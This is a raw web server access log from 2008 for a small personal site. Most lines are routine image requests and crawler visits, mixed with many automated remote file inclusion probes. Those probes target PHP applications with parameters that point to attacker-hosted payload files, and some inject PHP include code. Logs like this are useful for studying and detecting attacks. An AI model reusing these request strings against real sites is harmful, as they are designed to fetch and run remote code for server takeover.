74.10.5.213 - - [14/Jul/2008:10:26:03 -0700] "GET /blog/wp-content/gallery/crestoc-2008/thumbs/thumbs_img_0019.jpg HTTP/1.1" 200 10079 "http://www.dmulk.com/?show=gallery&pageid=17" "Mozilla/5.0 (Windows; U; Windows NT 5.1; en-US; rv:1.8.1.15) Gecko/20080623 Firefox/2.0.0.15" "dmulk.com"
74.10.5.213 - - [14/Jul/2008:10:26:03 -0700] "GET /blog/wp-content/gallery/crestoc-2008/thumbs/thumbs_img_0020.jpg HTTP/1.1" 200 10722 "http://www.dmulk.com/?show=gallery&pageid=17" "Mozilla/5.0 (Windows; U; Windows NT 5.1; en-US; rv:1.8.1.15) Gecko/20080623 Firefox/2.0.0.15" "dmulk.com"
74.10.5.213 - - [14/Jul/2008:10:26:03 -0700] "GET /blog/wp-content/gallery/crestoc-2008/thumbs/thumbs_img_0021.jpg HTTP/1.1" 200 9985 "http://www.dmulk.com/?show=gallery&pageid=17" "Mozilla/5.0 (Windows; U; Windows NT 5.1; en-US; rv:1.8.1.15) Gecko/20080623 Firefox/2.0.0.15" "dmulk.com"
74.10.5.213 - - [14/Jul/2008:10:26:03 -0700] "GET /blog/wp-content/gallery/crestoc-2008/thumbs/thumbs_img_0022.jpg HTTP/1.1" 200 11129 "http://www.dmulk.com/?show=gallery&pageid=17" "Mozilla/5.0 (Windows; U; Windows NT 5.1; en-US; rv:1.8.1.15) Gecko/20080623 Firefox/2.0.0.15" "dmulk.com"
74.10.5.213 - - [14/Jul/2008:10:26:03 -0700] "GET /blog/wp-content/gallery/crestoc-2008/thumbs/thumbs_img_0023.jpg HTTP/1.1" 200 10160 "http://www.dmulk.com/?show=gallery&pageid=17" "Mozilla/5.0 (Windows; U; Windows NT 5.1; en-US; rv:1.8.1.15) Gecko/20080623 Firefox/2.0.0.15" "dmulk.com"
74.10.5.213 - - [14/Jul/2008:10:26:04 -0700] "GET /blog/wp-content/gallery/crestoc-2008/thumbs/thumbs_img_0024.jpg HTTP/1.1" 200 8322 "http://www.dmulk.com/?show=gallery&pageid=17" "Mozilla/5.0 (Windows; U; Windows NT 5.1; en-US; rv:1.8.1.15) Gecko/20080623 Firefox/2.0.0.15" "dmulk.com"
74.10.5.213 - - [14/Jul/2008:10:26:04 -0700] "GET /blog/wp-content/gallery/crestoc-2008/thumbs/thumbs_img_0025.jpg HTTP/1.1" 200 11260 "http://www.dmulk.com/?show=gallery&pageid=17" "Mozilla/5.0 (Windows; U; Windows NT 5.1; en-US; rv:1.8.1.15) Gecko/20080623 Firefox/2.0.0.15" "dmulk.com"
74.10.5.213 - - [14/Jul/2008:10:26:04 -0700] "GET /blog/wp-content/gallery/crestoc-2008/thumbs/thumbs_img_0026.jpg HTTP/1.1" 200 11615 "http://www.dmulk.com/?show=gallery&pageid=17" "Mozilla/5.0 (Windows; U; Windows NT 5.1; en-US; rv:1.8.1.15) Gecko/20080623 Firefox/2.0.0.15" "dmulk.com"
74.10.5.213 - - [14/Jul/2008:10:26:04 -0700] "GET /blog/wp-content/gallery/crestoc-2008/thumbs/thumbs_img_0027.jpg HTTP/1.1" 200 10725 "http://www.dmulk.com/?show=gallery&pageid=17" "Mozilla/5.0 (Windows; U; Windows NT 5.1; en-US; rv:1.8.1.15) Gecko/20080623 Firefox/2.0.0.15" "dmulk.com"
74.10.5.213 - - [14/Jul/2008:10:26:04 -0700] "GET /blog/wp-content/gallery/crestoc-2008/thumbs/thumbs_img_0028.jpg HTTP/1.1" 200 10842 "http://www.dmulk.com/?show=gallery&pageid=17" "Mozilla/5.0 (Windows; U; Windows NT 5.1; en-US; rv:1.8.1.15) Gecko/20080623 Firefox/2.0.0.15" "dmulk.com"
74.10.5.213 - - [14/Jul/2008:10:26:04 -0700] "GET /blog/wp-content/gallery/crestoc-2008/thumbs/thumbs_img_0029.jpg HTTP/1.1" 200 10983 "http://www.dmulk.com/?show=gallery&pageid=17" "Mozilla/5.0 (Windows; U; Windows NT 5.1; en-US; rv:1.8.1.15) Gecko/20080623 Firefox/2.0.0.15" "dmulk.com"
202.130.125.73 - - [14/Jul/2008:10:26:04 -0700] "GET /logs/access_071225.log//faqsupport/samplefaqsupport.php?path[docroot]=http://www.geocities.com/fexcia/id2.txt? HTTP/1.1" 404 275 "-" "libwww-perl/5.805" "www.dmulk.com"
74.10.5.213 - - [14/Jul/2008:10:26:04 -0700] "GET /blog/wp-content/gallery/crestoc-2008/thumbs/thumbs_img_0030.jpg HTTP/1.1" 200 11202 "http://www.dmulk.com/?show=gallery&pageid=17" "Mozilla/5.0 (Windows; U; Windows NT 5.1; en-US; rv:1.8.1.15) Gecko/20080623 Firefox/2.0.0.15" "dmulk.com"
74.10.5.213 - - [14/Jul/2008:10:26:04 -0700] "GET /blog/wp-content/gallery/crestoc-2008/thumbs/thumbs_img_0031.jpg HTTP/1.1" 200 11165 "http://www.dmulk.com/?show=gallery&pageid=17" "Mozilla/5.0 (Windows; U; Windows NT 5.1; en-US; rv:1.8.1.15) Gecko/20080623 Firefox/2.0.0.15" "dmulk.com"
74.10.5.213 - - [14/Jul/2008:10:26:04 -0700] "GET /blog/wp-content/gallery/crestoc-2008/thumbs/thumbs_img_0032.jpg HTTP/1.1" 200 9887 "http://www.dmulk.com/?show=gallery&pageid=17" "Mozilla/5.0 (Windows; U; Windows NT 5.1; en-US; rv:1.8.1.15) Gecko/20080623 Firefox/2.0.0.15" "dmulk.com"
74.10.5.213 - - [14/Jul/2008:10:26:04 -0700] "GET /blog/wp-content/gallery/crestoc-2008/thumbs/thumbs_img_0033.jpg HTTP/1.1" 200 10850 "http://www.dmulk.com/?show=gallery&pageid=17" "Mozilla/5.0 (Windows; U; Windows NT 5.1; en-US; rv:1.8.1.15) Gecko/20080623 Firefox/2.0.0.15" "dmulk.com"
74.10.5.213 - - [14/Jul/2008:10:26:04 -0700] "GET /blog/wp-content/gallery/crestoc-2008/thumbs/thumbs_img_0034.jpg HTTP/1.1" 200 8457 "http://www.dmulk.com/?show=gallery&pageid=17" "Mozilla/5.0 (Windows; U; Windows NT 5.1; en-US; rv:1.8.1.15) Gecko/20080623 Firefox/2.0.0.15" "dmulk.com"
74.10.5.213 - - [14/Jul/2008:10:26:04 -0700] "GET /blog/wp-content/gallery/crestoc-2008/thumbs/thumbs_img_0035.jpg HTTP/1.1" 200 11177 "http://www.dmulk.com/?show=gallery&pageid=17" "Mozilla/5.0 (Windows; U; Windows NT 5.1; en-US; rv:1.8.1.15) Gecko/20080623 Firefox/2.0.0.15" "dmulk.com"
74.10.5.213 - - [14/Jul/2008:10:26:05 -0700] "GET /blog/wp-content/gallery/crestoc-2008/thumbs/thumbs_img_0036.jpg HTTP/1.1" 200 10874 "http://www.dmulk.com/?show=gallery&pageid=17" "Mozilla/5.0 (Windows; U; Windows NT 5.1; en-US; rv:1.8.1.15) Gecko/20080623 Firefox/2.0.0.15" "dmulk.com"
74.10.5.213 - - [14/Jul/2008:10:26:05 -0700] "GET /blog/wp-content/gallery/crestoc-2008/thumbs/thumbs_img_0038.jpg HTTP/1.1" 200 10194 "http://www.dmulk.com/?show=gallery&pageid=17" "Mozilla/5.0 (Windows; U; Windows NT 5.1; en-US; rv:1.8.1.15) Gecko/20080623 Firefox/2.0.0.15" "dmulk.com"
74.10.5.213 - - [14/Jul/2008:10:26:05 -0700] "GET /blog/wp-content/gallery/crestoc-2008/thumbs/thumbs_img_0039.jpg HTTP/1.1" 200 10574 "http://www.dmulk.com/?show=gallery&pageid=17" "Mozilla/5.0 (Windows; U; Windows NT 5.1; en-US; rv:1.8.1.15) Gecko/20080623 Firefox/2.0.0.15" "dmulk.com"
74.10.5.213 - - [14/Jul/2008:10:26:05 -0700] "GET /blog/wp-content/gallery/crestoc-2008/thumbs/thumbs_img_0040.jpg HTTP/1.1" 200 10832 "http://www.dmulk.com/?show=gallery&pageid=17" "Mozilla/5.0 (Windows; U; Windows NT 5.1; en-US; rv:1.8.1.15) Gecko/20080623 Firefox/2.0.0.15" "dmulk.com"
74.10.5.213 - - [14/Jul/2008:10:26:05 -0700] "GET /blog/wp-content/gallery/crestoc-2008/thumbs/thumbs_img_0041.jpg HTTP/1.1" 200 11161 "http://www.dmulk.com/?show=gallery&pageid=17" "Mozilla/5.0 (Windows; U; Windows NT 5.1; en-US; rv:1.8.1.15) Gecko/20080623 Firefox/2.0.0.15" "dmulk.com"
74.10.5.213 - - [14/Jul/2008:10:26:05 -0700] "GET /blog/wp-content/gallery/crestoc-2008/thumbs/thumbs_img_0042.jpg HTTP/1.1" 200 7584 "http://www.dmulk.com/?show=gallery&pageid=17" "Mozilla/5.0 (Windows; U; Windows NT 5.1; en-US; rv:1.8.1.15) Gecko/20080623 Firefox/2.0.0.15" "dmulk.com"
74.10.5.213 - - [14/Jul/2008:10:26:05 -0700] "GET /blog/wp-content/gallery/crestoc-2008/thumbs/thumbs_img_0043.jpg HTTP/1.1" 200 8644 "http://www.dmulk.com/?show=gallery&pageid=17" "Mozilla/5.0 (Windows; U; Windows NT 5.1; en-US; rv:1.8.1.15) Gecko/20080623 Firefox/2.0.0.15" "dmulk.com"
74.10.5.213 - - [14/Jul/2008:10:26:05 -0700] "GET /blog/wp-content/gallery/crestoc-2008/thumbs/thumbs_img_0044.jpg HTTP/1.1" 200 7643 "http://www.dmulk.com/?show=gallery&pageid=17" "Mozilla/5.0 (Windows; U; Windows NT 5.1; en-US; rv:1.8.1.15) Gecko/20080623 Firefox/2.0.0.15" "dmulk.com"
74.10.5.213 - - [14/Jul/2008:10:26:05 -0700] "GET /blog/wp-content/gallery/crestoc-2008/thumbs/thumbs_img_0046.jpg HTTP/1.1" 200 9865 "http://www.dmulk.com/?show=gallery&pageid=17" "Mozilla/5.0 (Windows; U; Windows NT 5.1; en-US; rv:1.8.1.15) Gecko/20080623 Firefox/2.0.0.15" "dmulk.com"
74.10.5.213 - - [14/Jul/2008:10:26:05 -0700] "GET /blog/wp-content/gallery/crestoc-2008/thumbs/thumbs_img_0045.jpg HTTP/1.1" 200 10920 "http://www.dmulk.com/?show=gallery&pageid=17" "Mozilla/5.0 (Windows; U; Windows NT 5.1; en-US; rv:1.8.1.15) Gecko/20080623 Firefox/2.0.0.15" "dmulk.com"
74.10.5.213 - - [14/Jul/2008:10:26:05 -0700] "GET /blog/wp-content/gallery/crestoc-2008/thumbs/thumbs_img_0047.jpg HTTP/1.1" 200 10657 "http://www.dmulk.com/?show=gallery&pageid=17" "Mozilla/5.0 (Windows; U; Windows NT 5.1; en-US; rv:1.8.1.15) Gecko/20080623 Firefox/2.0.0.15" "dmulk.com"
74.10.5.213 - - [14/Jul/2008:10:26:05 -0700] "GET /blog/wp-content/gallery/crestoc-2008/thumbs/thumbs_img_0048.jpg HTTP/1.1" 200 10693 "http://www.dmulk.com/?show=gallery&pageid=17" "Mozilla/5.0 (Windows; U; Windows NT 5.1; en-US; rv:1.8.1.15) Gecko/20080623 Firefox/2.0.0.15" "dmulk.com"
74.10.5.213 - - [14/Jul/2008:10:26:06 -0700] "GET /blog/wp-content/gallery/crestoc-2008/thumbs/thumbs_img_0049.jpg HTTP/1.1" 200 12180 "http://www.dmulk.com/?show=gallery&pageid=17" "Mozilla/5.0 (Windows; U; Windows NT 5.1; en-US; rv:1.8.1.15) Gecko/20080623 Firefox/2.0.0.15" "dmulk.com"
74.10.5.213 - - [14/Jul/2008:10:26:06 -0700] "GET /blog/wp-content/gallery/crestoc-2008/thumbs/thumbs_img_0050.jpg HTTP/1.1" 200 12586 "http://www.dmulk.com/?show=gallery&pageid=17" "Mozilla/5.0 (Windows; U; Windows NT 5.1; en-US; rv:1.8.1.15) Gecko/20080623 Firefox/2.0.0.15" "dmulk.com"
74.10.5.213 - - [14/Jul/2008:10:26:06 -0700] "GET /blog/wp-content/gallery/crestoc-2008/thumbs/thumbs_img_0051.jpg HTTP/1.1" 200 11044 "http://www.dmulk.com/?show=gallery&pageid=17" "Mozilla/5.0 (Windows; U; Windows NT 5.1; en-US; rv:1.8.1.15) Gecko/20080623 Firefox/2.0.0.15" "dmulk.com"
74.10.5.213 - - [14/Jul/2008:10:26:06 -0700] "GET /blog/wp-content/gallery/crestoc-2008/thumbs/thumbs_img_0052.jpg HTTP/1.1" 200 11024 "http://www.dmulk.com/?show=gallery&pageid=17" "Mozilla/5.0 (Windows; U; Windows NT 5.1; en-US; rv:1.8.1.15) Gecko/20080623 Firefox/2.0.0.15" "dmulk.com"
62.141.56.49 - - [14/Jul/2008:10:26:09 -0700] "GET /logs/config.php?path_to_root=http://www.yavuzselimlisesi.com/components/com_kanbankasi/language/id.txt??? HTTP/1.1" 404 275 "-" "libwww-perl/5.65" "www.dmulk.com"
62.141.56.49 - - [14/Jul/2008:10:26:10 -0700] "GET /config.php?path_to_root=http://www.yavuzselimlisesi.com/components/com_kanbankasi/language/id.txt??? HTTP/1.1" 404 275 "-" "libwww-perl/5.65" "www.dmulk.com"
74.10.5.213 - - [14/Jul/2008:10:26:10 -0700] "GET /blog/wp-content/uploads/2008/04/img_1130.JPG HTTP/1.1" 200 393216 "http://www.dmulk.com/?show=gallery&pageid=17" "Mozilla/5.0 (Windows; U; Windows NT 5.1; en-US; rv:1.8.1.15) Gecko/20080623 Firefox/2.0.0.15" "dmulk.com"
74.10.5.213 - - [14/Jul/2008:10:26:10 -0700] "GET /blog/wp-content/uploads/2008/04/img_1133.JPG HTTP/1.1" 200 327680 "http://www.dmulk.com/?show=gallery&pageid=17" "Mozilla/5.0 (Windows; U; Windows NT 5.1; en-US; rv:1.8.1.15) Gecko/20080623 Firefox/2.0.0.15" "dmulk.com"
74.10.5.213 - - [14/Jul/2008:10:26:10 -0700] "GET /blog/wp-content/uploads/2008/04/img_1124.JPG HTTP/1.1" 200 262144 "http://www.dmulk.com/?show=gallery&pageid=17" "Mozilla/5.0 (Windows; U; Windows NT 5.1; en-US; rv:1.8.1.15) Gecko/20080623 Firefox/2.0.0.15" "dmulk.com"
74.10.5.213 - - [14/Jul/2008:10:26:10 -0700] "GET /blog/wp-content/uploads/2008/04/img_1120.JPG HTTP/1.1" 200 327680 "http://www.dmulk.com/?show=gallery&pageid=17" "Mozilla/5.0 (Windows; U; Windows NT 5.1; en-US; rv:1.8.1.15) Gecko/20080623 Firefox/2.0.0.15" "dmulk.com"
74.10.5.213 - - [14/Jul/2008:10:26:10 -0700] "GET /blog/wp-content/uploads/2008/04/img_1123.JPG HTTP/1.1" 200 327680 "http://www.dmulk.com/?show=gallery&pageid=17" "Mozilla/5.0 (Windows; U; Windows NT 5.1; en-US; rv:1.8.1.15) Gecko/20080623 Firefox/2.0.0.15" "dmulk.com"
74.10.5.213 - - [14/Jul/2008:10:26:10 -0700] "GET /favicon.ico HTTP/1.1" 404 275 "-" "Mozilla/5.0 (Windows; U; Windows NT 5.1; en-US; rv:1.8.1.15) Gecko/20080623 Firefox/2.0.0.15" "www.dmulk.com"
74.10.5.213 - - [14/Jul/2008:10:26:10 -0700] "GET /blog/wp-content/themes/default/images/kubrickbgwide.jpg HTTP/1.1" 200 1014 "http://www.dmulk.com/?show=gallery&pageid=17" "Mozilla/5.0 (Windows; U; Windows NT 5.1; en-US; rv:1.8.1.15) Gecko/20080623 Firefox/2.0.0.15" "dmulk.com"
74.10.5.213 - - [14/Jul/2008:10:26:10 -0700] "GET /blog/wp-content/themes/default/images/kubrickheader.jpg HTTP/1.1" 200 7868 "http://dmulk.com/blog/wp-content/themes/default/style.css" "Mozilla/5.0 (Windows; U; Windows NT 5.1; en-US; rv:1.8.1.15) Gecko/20080623 Firefox/2.0.0.15" "dmulk.com"
74.10.5.213 - - [14/Jul/2008:10:26:11 -0700] "GET /blog/wp-content/uploads/2008/04/img_1129.JPG HTTP/1.1" 200 196608 "http://www.dmulk.com/?show=gallery&pageid=17" "Mozilla/5.0 (Windows; U; Windows NT 5.1; en-US; rv:1.8.1.15) Gecko/20080623 Firefox/2.0.0.15" "dmulk.com"
217.196.211.165 - - [14/Jul/2008:10:26:13 -0700] "GET /logs/access_080207.log//faqsupport/samplefaqsupport.php?path[docroot]=http://www.geocities.com/fexcia/id2.txt? HTTP/1.1" 404 275 "-" "libwww-perl/5.805" "www.dmulk.com"
217.196.211.165 - - [14/Jul/2008:10:26:13 -0700] "GET //faqsupport/samplefaqsupport.php?path[docroot]=http://www.geocities.com/fexcia/id2.txt? HTTP/1.1" 404 275 "-" "libwww-perl/5.805" "www.dmulk.com"
62.2.100.138 - - [14/Jul/2008:10:26:17 -0700] "GET /logs/access_080313.log//index.php?name=PNphpBB2&file=viewtopic&t=8/viewtopic.php?p=15&sid=be4c914eb746ac7c96beea717fdfc692/&highlight=%27.include($_GET[a]),exit.%27&a=http://www.coronaclub.it/pk_gallery/photos/25/11828333/idilegal.txt??? HTTP/1.1" 404 275 "-" "libwww-perl/5.803" "www.dmulk.com"
87.242.99.137 - - [14/Jul/2008:10:26:17 -0700] "GET /logs/access_080128.log/?mosConfig_absolute_path=http://www.geocities.com/boy_nozz/taf/id.txt??? HTTP/1.1" 404 275 "-" "libwww-perl/5.803" "www.dmulk.com"
217.196.211.165 - - [14/Jul/2008:10:26:17 -0700] "GET /logs//faqsupport/samplefaqsupport.php?path[docroot]=http://www.geocities.com/fexcia/id2.txt? HTTP/1.1" 404 275 "-" "libwww-perl/5.805" "www.dmulk.com"
62.2.100.138 - - [14/Jul/2008:10:26:21 -0700] "GET //index.php?name=PNphpBB2&file=viewtopic&t=8/viewtopic.php?p=15&sid=be4c914eb746ac7c96beea717fdfc692/&highlight=%27.include($_GET[a]),exit.%27&a=http://www.coronaclub.it/pk_gallery/photos/25/11828333/idilegal.txt??? HTTP/1.1" 200 3694 "-" "libwww-perl/5.803" "www.dmulk.com"
87.242.99.137 - - [14/Jul/2008:10:26:21 -0700] "GET /?mosConfig_absolute_path=http://www.geocities.com/boy_nozz/taf/id.txt??? HTTP/1.1" 200 18445 "-" "libwww-perl/5.803" "www.dmulk.com"
217.196.211.165 - - [14/Jul/2008:10:26:21 -0700] "GET /logs/access_071225.log//faqsupport/samplefaqsupport.php?path[docroot]=http://www.geocities.com/fexcia/id2.txt? HTTP/1.1" 404 275 "-" "libwww-perl/5.805" "www.dmulk.com"
87.242.99.137 - - [14/Jul/2008:10:26:22 -0700] "GET /logs/?mosConfig_absolute_path=http://www.geocities.com/boy_nozz/taf/id.txt??? HTTP/1.1" 200 56136 "-" "libwww-perl/5.803" "www.dmulk.com"
62.2.100.138 - - [14/Jul/2008:10:26:22 -0700] "GET /logs//index.php?name=PNphpBB2&file=viewtopic&t=8/viewtopic.php?p=15&sid=be4c914eb746ac7c96beea717fdfc692/&highlight=%27.include($_GET[a]),exit.%27&a=http://www.coronaclub.it/pk_gallery/photos/25/11828333/idilegal.txt??? HTTP/1.1" 404 275 "-" "libwww-perl/5.803" "www.dmulk.com"
203.72.181.15 - - [14/Jul/2008:10:26:30 -0700] "GET /logs/access_080129.log//sohoadmin/program/modules/includes/login.php?_SESSION[docroot_path]=http://www.proostjes.be/calendar/id.txt??? HTTP/1.1" 404 275 "-" "libwww-perl/5.65" "www.dmulk.com"
62.141.56.49 - - [14/Jul/2008:10:26:33 -0700] "GET /logs/access_080207.log//newspublish/include.php?path%5Bdocroot%5D=http://www.yavuzselimlisesi.com/components/com_kanbankasi/language/id.txt??? HTTP/1.1" 404 275 "-" "libwww-perl/5.65" "www.dmulk.com"
87.242.99.137 - - [14/Jul/2008:10:26:48 -0700] "GET /logs/access_071218.log/?mosConfig_absolute_path=http://www.geocities.com/boy_nozz/taf/id.txt??? HTTP/1.1" 404 275 "-" "libwww-perl/5.803" "www.dmulk.com"
190.54.28.163 - - [14/Jul/2008:10:27:10 -0700] "GET /logs/access_080401.log/download.php?sub=ftp://81.177.8.194/Upload/trem/oldbisok?? HTTP/1.1" 404 275 "-" "libwww-perl/5.805" "www.dmulk.com"
65.98.89.90 - - [14/Jul/2008:10:27:28 -0700] "GET /logs/access.log//components/com_extcalendar/errors.php?error=http://i.afmcpune.com/servlets/.../sistem.txt??? HTTP/1.1" 404 275 "-" "libwww-perl/5.811" "www.dmulk.com"
65.98.89.90 - - [14/Jul/2008:10:27:32 -0700] "GET //components/com_extcalendar/errors.php?error=http://i.afmcpune.com/servlets/.../sistem.txt??? HTTP/1.1" 404 275 "-" "libwww-perl/5.811" "www.dmulk.com"
65.98.89.90 - - [14/Jul/2008:10:27:34 -0700] "GET /logs//components/com_extcalendar/errors.php?error=http://i.afmcpune.com/servlets/.../sistem.txt??? HTTP/1.1" 404 275 "-" "libwww-perl/5.811" "www.dmulk.com"
69.93.48.162 - - [14/Jul/2008:10:27:37 -0700] "GET /logs/access_080228.log/index.php5?lang=ftp://81.177.8.194/Upload/trem/oldbisok?? HTTP/1.1" 404 275 "-" "libwww-perl/5.69" "www.dmulk.com"
69.93.48.162 - - [14/Jul/2008:10:27:37 -0700] "GET /logs/access_080228.log/index.php5?lang=http://xxxxxx.xxxxx.xxx.gif? HTTP/1.1" 404 275 "-" "libwww-perl/5.69" "www.dmulk.com"
69.93.48.162 - - [14/Jul/2008:10:27:37 -0700] "GET /logs/index.php5?lang=ftp://81.177.8.194/Upload/trem/oldbisok?? HTTP/1.1" 404 275 "-" "libwww-perl/5.69" "www.dmulk.com"
69.93.48.162 - - [14/Jul/2008:10:27:38 -0700] "GET /logs/index.php5?lang=http://xxxxxx.xxxxx.xxx.gif? HTTP/1.1" 404 275 "-" "libwww-perl/5.69" "www.dmulk.com"
87.242.99.137 - - [14/Jul/2008:10:27:54 -0700] "GET /logs/access_080128.log/?mosConfig_absolute_path=http://www.geocities.com/boy_nozz/taf/id.txt??? HTTP/1.1" 404 275 "-" "libwww-perl/5.803" "www.dmulk.com"
202.130.125.73 - - [14/Jul/2008:10:27:55 -0700] "GET /logs/access_080315.log//PhpLinkExchange/bits_listings.php?svr_rootP=http://www.geocities.com/fexcia/id2.txt? HTTP/1.1" 404 275 "-" "libwww-perl/5.805" "www.dmulk.com"
202.130.125.73 - - [14/Jul/2008:10:27:56 -0700] "GET //PhpLinkExchange/bits_listings.php?svr_rootP=http://www.geocities.com/fexcia/id2.txt? HTTP/1.1" 404 275 "-" "libwww-perl/5.805" "www.dmulk.com"
202.130.125.73 - - [14/Jul/2008:10:27:56 -0700] "GET /logs//PhpLinkExchange/bits_listings.php?svr_rootP=http://www.geocities.com/fexcia/id2.txt? HTTP/1.1" 404 275 "-" "libwww-perl/5.805" "www.dmulk.com"
87.242.99.137 - - [14/Jul/2008:10:28:00 -0700] "GET /logs/?mosConfig_absolute_path=http://www.geocities.com/boy_nozz/taf/id.txt??? HTTP/1.1" 200 56136 "-" "libwww-perl/5.803" "www.dmulk.com"
202.130.125.73 - - [14/Jul/2008:10:28:04 -0700] "GET /logs/access_080313.log//PhpLinkExchange/bits_listings.php?svr_rootP=http://www.geocities.com/fexcia/id2.txt? HTTP/1.1" 404 275 "-" "libwww-perl/5.805" "www.dmulk.com"
74.6.22.88 - - [14/Jul/2008:10:28:10 -0700] "GET /blog/index.php/2008/?show=gallery&nggpage=3 HTTP/1.0" 200 28386 "-" "Mozilla/5.0 (compatible; Yahoo! Slurp; http://help.yahoo.com/help/us/ysearch/slurp)" "dmulk.com"
87.242.99.137 - - [14/Jul/2008:10:28:10 -0700] "GET /?mosConfig_absolute_path=http://www.geocities.com/boy_nozz/taf/id.txt??? HTTP/1.1" 200 18446 "-" "libwww-perl/5.803" "www.dmulk.com"
203.88.114.169 - - [14/Jul/2008:10:28:19 -0700] "GET /logs//administrator/components/com_chronocontact/excelwriter/errors.php?error=http://i.afmcpune.com/servlets/.../sistem.txt??? HTTP/1.1" 404 275 "-" "libwww-perl/5.811" "www.dmulk.com"
203.88.114.169 - - [14/Jul/2008:10:28:19 -0700] "GET //administrator/components/com_chronocontact/excelwriter/errors.php?error=http://i.afmcpune.com/servlets/.../sistem.txt??? HTTP/1.1" 404 275 "-" "libwww-perl/5.811" "www.dmulk.com"
87.242.99.137 - - [14/Jul/2008:10:28:24 -0700] "GET /logs/access_071218.log/?mosConfig_absolute_path=http://www.geocities.com/boy_nozz/taf/id.txt??? HTTP/1.1" 404 275 "-" "libwww-perl/5.803" "www.dmulk.com"
74.6.22.88 - - [14/Jul/2008:10:28:45 -0700] "GET /blog/index.php/2008/?show=gallery&nggpage=3 HTTP/1.0" 200 28385 "-" "Mozilla/5.0 (compatible; Yahoo! Slurp; http://help.yahoo.com/help/us/ysearch/slurp)" "dmulk.com"
85.17.200.206 - - [14/Jul/2008:10:28:59 -0700] "GET /logs//plugins/spamx/BlackList.Examine.class.php?_CONF[path]=http://www.tolokan.ovh.org/classes/adodbt/.../rid?? HTTP/1.1" 404 275 "-" "libwww-perl/5.79" "www.dmulk.com"
85.17.200.206 - - [14/Jul/2008:10:28:59 -0700] "GET //plugins/spamx/BlackList.Examine.class.php?_CONF[path]=http://www.tolokan.ovh.org/classes/adodbt/.../rid?? HTTP/1.1" 404 275 "-" "libwww-perl/5.79" "www.dmulk.com"
203.247.42.143 - - [14/Jul/2008:10:29:07 -0700] "GET /logs/access_071225.log//modules/coppermine/themes/default/theme.php?THEME_DIR=http://www.montana.uchile.cl/downloads/plan.pps?? HTTP/1.1" 404 275 "-" "libwww-perl/5.79" "www.dmulk.com"
203.247.42.143 - - [14/Jul/2008:10:29:07 -0700] "GET //modules/coppermine/themes/default/theme.php?THEME_DIR=http://www.montana.uchile.cl/downloads/plan.pps?? HTTP/1.1" 404 275 "-" "libwww-perl/5.79" "www.dmulk.com"
203.247.42.143 - - [14/Jul/2008:10:29:07 -0700] "GET /logs//modules/coppermine/themes/default/theme.php?THEME_DIR=http://www.montana.uchile.cl/downloads/plan.pps?? HTTP/1.1" 404 275 "-" "libwww-perl/5.79" "www.dmulk.com"
212.112.255.3 - - [14/Jul/2008:10:29:08 -0700] "GET //modules/Forums/viewonline.php?phpbb_root_path=http://www.rostop.com/zerocool/id.txt??? HTTP/1.1" 404 275 "-" "Mozilla/5.0 (BeOS; U; BeOS BePC; en-US; rv:1.9a1) Gecko/20051002 Firefox/1.6a1" "www.dmulk.com"
212.112.255.3 - - [14/Jul/2008:10:29:08 -0700] "GET /logs//modules/Forums/viewonline.php?phpbb_root_path=http://www.rostop.com/zerocool/id.txt??? HTTP/1.1" 404 275 "-" "Mozilla/5.0 (BeOS; U; BeOS BePC; en-US; rv:1.9a1) Gecko/20051002 Firefox/1.6a1" "www.dmulk.com"
62.141.56.49 - - [14/Jul/2008:10:29:18 -0700] "GET /logs/access_080313.log//index.php?name=PNphpBB2&file=viewtopic&t=8/viewtopic.php?p=15&sid=be4c914eb746ac7c96beea717fdfc692/&highlight=%27.include($_GET[a]),exit.%27&a=http://www.yavuzselimlisesi.com/components/com_kanbankasi/language/id.txt??? HTTP/1.1" 404 275 "-" "libwww-perl/5.65" "www.dmulk.com"
62.141.56.49 - - [14/Jul/2008:10:29:27 -0700] "GET //index.php?name=PNphpBB2&file=viewtopic&t=8/viewtopic.php?p=15&sid=be4c914eb746ac7c96beea717fdfc692/&highlight=%27.include($_GET[a]),exit.%27&a=http://www.yavuzselimlisesi.com/components/com_kanbankasi/language/id.txt??? HTTP/1.1" 200 3694 "-" "libwww-perl/5.65" "www.dmulk.com"
62.141.56.49 - - [14/Jul/2008:10:29:27 -0700] "GET /logs//index.php?name=PNphpBB2&file=viewtopic&t=8/viewtopic.php?p=15&sid=be4c914eb746ac7c96beea717fdfc692/&highlight=%27.include($_GET[a]),exit.%27&a=http://www.yavuzselimlisesi.com/components/com_kanbankasi/language/id.txt??? HTTP/1.1" 404 275 "-" "libwww-perl/5.65" "www.dmulk.com"
62.244.71.72 - - [14/Jul/2008:10:29:36 -0700] "GET /logs/errors.php?error=http://arabhack.110mb.com/kngid.txt??? HTTP/1.1" 404 275 "-" "libwww-perl/5.803" "www.dmulk.com"
203.247.42.143 - - [14/Jul/2008:10:29:39 -0700] "GET /logs/access_080225.log//modules/coppermine/themes/default/theme.php?THEME_DIR=http://www.montana.uchile.cl/downloads/plan.pps?? HTTP/1.1" 404 275 "-" "libwww-perl/5.79" "www.dmulk.com"
212.92.23.89 - - [14/Jul/2008:10:29:41 -0700] "GET /logs/access_080218.log//administrator/components/com_chronocontact/excelwriter/errors.php?error=http://i.afmcpune.com/servlets/.../sistem.txt??? HTTP/1.1" 404 275 "-" "libwww-perl/5.805" "www.dmulk.com"
212.92.23.89 - - [14/Jul/2008:10:29:41 -0700] "GET //administrator/components/com_chronocontact/excelwriter/errors.php?error=http://i.afmcpune.com/servlets/.../sistem.txt??? HTTP/1.1" 404 275 "-" "libwww-perl/5.805" "www.dmulk.com"
212.92.23.89 - - [14/Jul/2008:10:29:41 -0700] "GET /logs//administrator/components/com_chronocontact/excelwriter/errors.php?error=http://i.afmcpune.com/servlets/.../sistem.txt??? HTTP/1.1" 404 275 "-" "libwww-perl/5.805" "www.dmulk.com"
62.244.71.72 - - [14/Jul/2008:10:29:43 -0700] "GET /logs/errors.php?error=http://www.geocities.com/fexcia/kngid.txt? HTTP/1.1" 404 275 "-" "libwww-perl/5.803" "www.dmulk.com"
194.143.183.8 - - [14/Jul/2008:10:29:43 -0700] "GET /download.php?sub=http://www.tiptopwendys.co.za/ips.txt? HTTP/1.1" 404 275 "-" "libwww-perl/5.79" "www.dmulk.com"
62.244.71.72 - - [14/Jul/2008:10:29:48 -0700] "GET /errors.php?error=http://www.geocities.com/fexcia/kngid.txt? HTTP/1.1" 404 275 "-" "libwww-perl/5.803" "www.dmulk.com"
